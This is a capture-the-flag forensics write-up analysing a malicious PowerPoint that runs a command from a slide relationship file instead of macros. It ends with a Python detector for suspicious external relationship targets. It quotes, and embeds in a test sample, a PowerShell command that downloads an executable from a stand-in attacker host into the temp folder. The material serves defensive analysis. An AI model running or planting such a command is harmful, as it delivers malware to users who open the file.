
AlienPhish

In this forensics challenge we are given a PowerPoint file that we need to analyse. We expect it to contain macros that we will need to analyse and reverse engineer to figure out the flag.

We can first use olevba for this; it is a tool by Philippe Lagadec, who has written a whole collection of Office forensics tools (oletools).

┌──(kali㉿kali)-[~]
└─$ olevba Alien\ Weaknesses.pptx
olevba 0.56.1 on Python 3.9.1 - http://decalage.info/python/oletools
===============================================================================
FILE: Alien Weaknesses.pptx
Type: OpenXML
No VBA macros found.

However, as seen above, there are no macros in the file.

Instead of further static analysis, we can simply run the (likely) malicious file in a malware sandbox. I tend to use app.any.run for this, although you do need to register.

I created a public task and uploaded the file. The sandbox lets the file run and records every action it performs for later analysis. It also allows you to interact with the sandbox (mouse, keyboard, etc.) in order to trigger the malware, as not all malware runs simply by opening the file (as in this case).

The public task can be seen here.

On the right-hand side there is a table containing all the subsequent processes spawned by the file. These look interesting.

The main one of interest is:

powershell  -c "$o = $env:temp + 'Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99.exe'; iwr http:/destroyearth.alien/x.exe -outfile $o"

This is the final command that is run; essentially we have let the malware deobfuscate itself and are just looking at the final command executed.

There is an encoded string in the command (the name of the dropped `.exe`), which we can decode using CyberChef. The recipe is here; it uses Base64 with the URL/filename-safe alphabet (the `_` in the string, in place of `/`, is the giveaway). As we can see from the recipe, the flag is CHTB{pH1sHiNg_w0_m4cr0s>??}. Evidently, the malicious file does not use macros.

So, if not macros, then how?

It turns out that the command that was executed is stored in slides/_rels/slide1.xml.rels (a PowerPoint, Excel or Word file is actually just a ZIP archive). The command is run after we confirm the prompt that shows up when the presentation is run.
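The two findings above (a base64url-encoded filename inside the command, and a command hidden in a slide's relationship part rather than in a macro) can be checked without a sandbox. The following script is an added example, not code from the write-up or from oletools: it walks every `_rels/*.rels` part of an OOXML archive, reports `TargetMode="External"` relationships whose target is not an ordinary web or mailto link, and decodes the base64url token. The sample archive is constructed in the script (the write-up's command placed at `ppt/slides/_rels/slide1.xml.rels`, next to a harmless https link, so the filter has something to ignore); the helper and function names are my own.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
RELS_PART = re.compile(r"/_rels/[^/]+\.rels$")
ORDINARY_LINK = re.compile(r"^(https?|mailto):", re.IGNORECASE)


def suspicious_external_targets(ooxml: bytes) -> list[tuple[str, str]]:
    """Return (rels part, Target) for every TargetMode="External" relationship whose
    target is not a plain http(s)/mailto URL. A click-to-run hyperlink that launches
    a local program lands here even though olevba reports no macros."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ooxml)) as z:
        for part in z.namelist():
            if not RELS_PART.search(part):
                continue
            for rel in ET.fromstring(z.read(part)).iter(f"{{{PKG_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and not ORDINARY_LINK.match(target):
                    hits.append((part, target))
    return hits


def b64url_decode(token: str) -> str:
    """Decode base64 in the URL/filename-safe alphabet ('-' and '_'); padding optional."""
    return base64.urlsafe_b64decode(token + "=" * (-len(token) % 4)).decode()


# Constructed sample: the command seen in the sandbox, quoted as the write-up gives it.
SAMPLE_CMD = ("powershell  -c \"$o = $env:temp + 'Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99.exe'; "
              "iwr http:/destroyearth.alien/x.exe -outfile $o\"")


def build_sample_pptx() -> bytes:
    """Minimal pptx-style archive: one slide rels part with a benign link and the command."""
    root = ET.Element("Relationships", xmlns=PKG_NS)
    for rid, target in (("rId2", "https://example.com/"), ("rId3", SAMPLE_CMD)):
        ET.SubElement(root, "Relationship", Id=rid, Type=HYPERLINK_TYPE,
                      Target=target, TargetMode="External")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/slides/_rels/slide1.xml.rels",
                   ET.tostring(root, xml_declaration=True, encoding="UTF-8"))
    return buf.getvalue()


if __name__ == "__main__":
    for part, target in suspicious_external_targets(build_sample_pptx()):
        print(f"{part}: {target}")
        token = re.search(r"'([A-Za-z0-9_-]+)\.exe'", target)
        if token:
            print("  base64url filename decodes to:", b64url_decode(token.group(1)))
```

To triage a real file, pass `open("Alien Weaknesses.pptx", "rb").read()` to `suspicious_external_targets` instead of the constructed sample.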